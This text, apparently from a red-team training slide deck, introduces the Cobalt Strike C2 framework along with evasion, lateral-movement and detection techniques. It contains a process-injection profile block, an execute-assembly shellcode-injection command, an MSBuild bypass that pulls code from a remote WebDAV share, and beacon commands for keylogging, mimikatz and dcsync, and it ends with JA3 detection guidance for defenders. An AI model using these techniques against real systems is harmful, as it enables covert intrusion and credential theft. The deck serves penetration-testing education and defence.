Cobalt Strike Basics

@TimMedin
[email protected]
@RedSiege

@JoeVest
[email protected]
TIM MEDIN
CEO - Red Siege Information Security
SANS Author – 560
SANS Instructor – 560, 660
IANS Faculty
Pen Tester : More than a decade
Offensive : Forever

2
JOE VEST
Technical Director – Cobalt Strike, Help Systems
Author "Red Development and Operations"
Original author of SANS564: Red Team Ops
Red Teamer for decades

3
 WHAT IS COBALT STRIKE?
Command and Control framework for threat-based security tests
• Red Team
• Purple Team
• Pen Tests
Cobalt Strike is like Photoshop. Photoshop doesn't create art for you. It
provides the tools to a professional to create masterpieces. Both are
only as good as the operator.
redsiege.com 4
 SET UP AND
ARCHITECTURE
 COBALT STRIKE SETUP
Team Server: Where listeners are configured and beacons are controlled
Listener: Service running on the Team Server listening for callbacks
Beacon: Agent running on compromised host

References: https://www.ired.team/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands

redsiege.com 6
 TEAM SERVER
Java based server
Default console port is 50050/tcp
Defaults (a.k.a. Poor Opsec):
Identify this host by connecting to port 50050
Look for the default TLS certificate on another port

redsiege.com 7
 BEACON COMMS
Built-in listeners for HTTP/HTTPS and DNS
Multiple extensions exist to use other C2
Dropbox
OneDrive
Slack
Many others – we'll discuss more options later
redsiege.com 8
 REDIRECTOR
Used to protect (hide) the team server via proxy
Allows the attackers to burn the redirector and not have to build a new
team-server
Team server can send beacons to new redirectors (listeners)
Methods: IPTables forwarding, SOCAT, ModRewrite
Other plugins allow for other protocols and cloud services
References: https://www.ired.team/offensive-security/red-team-infrastructure/redirectors-forwarders

redsiege.com 9
MALLEABLE C2
 MALLEABLE C2
The "C2 Profile" defines how the server and beacon communicate

Good profiles, start with a "theme"

Look at good traffic for a plugin, web framework, or
Examples:
https://github.com/threatexpress/malleable-c2
https://github.com/xx0hcd/Malleable-C2-Profiles

https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-
malleable-c2-feature/
References: https://www.cobaltstrike.com/help-malleable-c2

redsiege.com 11
 MALLEABLE C2
Each profile contains these pieces

• global options • http-post

• https-certificate (optional) • client
• http-get • id
• client • output
• metadata • server
• server • output
• output • http-stager

References: https://github.com/threatexpress/malleable-c2/blob/master/MalleableExplained.md
https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/
redsiege.com 12
https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/
https://github.com/threatexpress/malleable-c2
https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/mayoclinic.profile
https://cobalt-strike.github.io/community_kit/
ARTIFACT KIT (AND OTHERS)
Hiding from AV/EDR still uses static signatures to some degree
• Offsets
• Name of Named Pipe for SMB
• Load addresses
• Loading techniques
• Many others
Other Kits (as of 4.4):
• User Defined Reflective Loader
• Sleepmask
• Mimikatz 21
STAY IN MEMORY
 IN-MEMORY EXECUTION
Only touch disk if you have to (but don't be scared of it either)

Much harder to detect in memory

Need something to constantly scan memory
No pinch point of writing to disk

redsiege.com 23
 IN-MEMORY EXECUTION
Common things tools look for

Reflectively loaded DLLs

Injected threads
IAT/EAT hooking
Command-line (PowerShell Logging and constrained language mode)
Function calls: CreateRemoteThread, WriteProcessMemory, VirtulaAlocEx*

redsiege.com 24
 LOADER
You may want to use a custom loader to launch a beacon

Beacon is the final payload, it is not always the best choice for initial
execution
You may consider using a customer loader to run beacon shellcode or
reflectively load a DLL
Think of this as "Stage 0"

redsiege.com 25
 process-inject MALLEABLE C2
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";

# shape the content and properties of what we will inject

set min_alloc "16384";
set userwx "false";

transform-x86 {
prepend "\x90";
}

transform-x64 {
prepend "\x90";
}

# specify how we execute code in the remote process

execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
RtlCreateUserThread;
}
}

redsiege.com 26
 HIDING IN-MEMORY
Defensive tools don't check non-X memory
Create Timer
Set memory as Non-X
Wait
Use call rop-chain to mark as X
Execute
Repeat
https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
redsiege.com 27
 POWERSHELL
PowerShell is either the offenses best friend or worst enemy, there is
no middle ground

The best way to get caught is to simply use PowerShell

… but if not caught, it is amazing

PowerPick can help (wrapper for System.ManagementAutomation.dll)

Use logging, use constrained language mode
Many tools, including the Empire suite run entirely in PowerShell
redsiege.com 28
 execute-assembly
If PowerShell is burned, switch to other native tools
.NET is the new hotness

Loads a .NET executable

Call the entry point
Profit!
Works with .Net 3.5 and 4.+

https://www.ired.team/offensive-security/code-injection-process-injection/injecting-and-executing-.net-
assemblies-to-unmanaged-process

redsiege.com 29
 ARBITRARY SHELLCODE
Use execute-assembly with custom shellcode

Convert shellcode to base64

Use the RemoteInject.exe or the injector script

execute-assembly /path/RemoteInject.exe PID aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQo=

https://github.com/Mr-Un1k0d3r/RemoteProcessInjection
redsiege.com 30
 APP CONTROL BYPASSES
Bounce off known good executables to get access
Bonus: Use Microsoft Executables

Example: MSBuild
Inline tasks are a way to enrich the application building process using
code you provide (This code can be arbitrary C#/.NET code)
Example Lab from 560.3

https://fortynorthsecurity.com/blog/another-msbuild-bypass-february-2020-edition/
redsiege.com 31
 IN-MEMORY EXECUTION
<Project ToolsVersion="4.0" xmlns="http://schemas.mi
<Target Name="Hello">

MSBuild Example
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framewor
<Task>
Execution is via MSBuild <Code Type="Class" Language="cs">
<![CDATA[
using System;
Execute arbitrary code, included shellcode using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
Even remotely public class ClassExample : Task, ITask
{
public override bool Execute()
<Code Type="Class" Language="cs" Source="\\11.22.33.44\webdav\calc.cs"> {
Console.WriteLine("Hello SEC560!")
return true;
}
https://fortynorthsecurity.com/blog/another-msbuild-bypass-february-2020-edition/ }
]]>
https://fortynorthsecurity.com/blog/remotely-host-msbuild-payloads/ </Code>
</Task>
</UsingTask>
redsiege.com </Project> 32
LATERAL MOVEMENT
 USE CREDS AND ACCESS TO MOVE
Very few fancy exploits these days
Usually don't need them either!

Everyone has access to the fileshare

Everyone has access to SharePoint
Using the privileged cred in the wrong place is trouble
• Over privileged accounts
• DA on end-user system
So many lost, stolen creds
redsiege.com 34
 TOP METHODS
Use built-in tools (via "jump" command) to stay hidden
WMI/WMIC, WinRM, and PSExec

PSExec: Push executable to target and execute as service (OPSEC!)

WinRM: WinRM PowerShell
WMI: PowerShell
Custom 3rd party tools and script so run native tools, shellcode or
bounce off things like MSBuild

redsiege.com 35
 HOW TO GET CREDS
Credentials (and existing access) are the biggest pivoting method

Ask! (phishing)
Credential Stuffing – Credentials lost in 3rd party breach and reused
Spraying – Try the same bad password for lots of users
Kerberoasting – https://redsiege.com/kerb101
Found credentials
Reused credentials
redsiege.com 36
C2 DESIGN
 ATTACK INFRASTRUCTURE
Multiple tiers to maintain persistence/access

Interactive – highest risk to attacker, faster call backs

Short Haul – Slower (1-24hr), used to build Interactive connections
Long Haul – Slowest (12hrs-days), used to build Short Haul
Add jitter to reduce patter fingerprint
Change protocols and/or C2 profile for each

redsiege.com 38
 OPERATIONAL SECURITY
Give defense as little as possible to work with
This is part of a custom loader (not built-in)
• Use keyed executables (guardrails) – Payloads can only run on non-
VMs, domain joined hosts (with specific domain), with X
processors, etc
• C2 should only be accessible to offense (not always the case)
• Don't use defaults (certificate, default profile)

redsiege.com 39
 CLOUD FRONTING
Use high reputation services to redirect traffic

Classic Domain Fronting is still useful,

but dying
HTTP Proxies – Google, Azure, AWS
Custom Proxies – AWS Lamda

redsiege.com 40
 DOMAIN SELECTION
Never let them see you!

Some categories of web sites are not intercepted by proxies

• Medical
• Banking
Where can you get a domain?
• Domain Shepherding – Get your domain categorized
• Expired domains – ExpiredDomains.net
redsiege.com 41
 C2 METHODS
Not always HTTP(S)
Built-in:
• DNS is fantastic IF no one is watching, but is LOUD!
• SMB
• External C2 Framework
Custom:
• Custom C2 with C3 (still caught with JA3 as the profile is the same!)
https://labs.f-secure.com/tools/c3
• Slack: https://rastamouse.me/blog/c3-first-look/
redsiege.com 42
 NAMED PIPE
Communicate between compromised hosts using SMB

Link one host to another

Needs to link back directly (or via chain) to a listener
There is no SMB listener to call back directly to the team server

redsiege.com 43
BUILT-IN FEATURES
 COMMANDS
run – execute a shell command via spawn/spawnto – spawn a session in
cmd.exe rundll32
powerpick – Execute PowerShell via inject – inject a session into a process
Unmanaged PowerShell dllinject – inject reflective DLL into a
psinject – inject Unmanged process
PowerShell into a process shinject – inject shellcode into
powershell-import – Import a process
PowerShell script ppid – change the Parent Process ID
execute-assembly – run local .NET blockdlls start – Ask the beacon
executable with a signature policy that prevents
non-Microsoft DLLS from loading
redsiege.com 46
 COMMANDS
upload/download steal_token – impersonate user from
keylogger another process
screenshot make_token – create a token for a user
using credentials
socks ####
kerberos_ticket_use – inject
portscan #-#
kerberos ticket (often used with Golden
elevate – use an exploit to elevate ticket)
logonpassword – use mimikatz to get
passwords
dcsync – get all hashes from DC

redsiege.com 47
DETECTION
 WTH IS JA3
The JA3 algorithm takes a collection of settings from the SSL "Client
Hello" such as SSL/TLS version, accepted cipher suites, list of
extensions, accepted elliptic curves, and elliptic curve formats. For
compactness the JA3 string is hashed with MD5. ~ja3er.com
With the transaction to secure HTTPS communications, it is harder to
understand who is talking to who

redsiege.com 49
 JA3 CALCULATION
Hash the decimal values for the bytes in the following fields (leave
empty if null)
• SSLVersion
• Cipher
• SSLExtension
• EllipticCurve
• EllipticCurvePointFormat
Examples:
769,47-53-5-10-49161-49162-49171-49172-50-56-19-4,0-10-11,23-24-25,0  ada70206e40642a3e4461f35503241d5
769,4-5-10-9-100-98-3-6-19-18-99,,,  de350869b8c85de67a350c8d186f11e6
50
 JA3 DETECTIONS
The JA3 (and JA3S) for Cobalt Strike is very regular
Cobalt Strike Win10 to Kali: Metasploit Win10 to Kali:
(JA3=72a589da586844d7f0818ce684948eea OR (JA3=72a589da586844d7f0818ce684948eea OR
JA3=a0e9f5d64349fb13191bc781f81f42e1) AND JA3=a0e9f5d64349fb13191bc781f81f42e1) AND
JA3S=b742b407517bac9536a77a7b0fee28e9 JA3S=70999de61602be74d4b25185843bd18e

In my (Tim's) experience against an apex defender, this triggered with all the C2 methods we used (Dropbox,
Slack, etc)

https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967
redsiege.com 51
STOP FOCUSING ON THE TOOL
Focus on the techniques
If you're focusing on detecting the tool, you're going to miss
Cobalt Strike is an access mechanism, there are others
Cobalt Strike Threat Hunting by Chad Tilbury (@chadtilbury)
https://www.youtube.com/watch?v=borfuQGrB8g
Defenders Guide to Cobalt Strike
https://thedfirreport.com/2021/08/29/cobalt-strike-a-
defenders-guide/

52
Questions?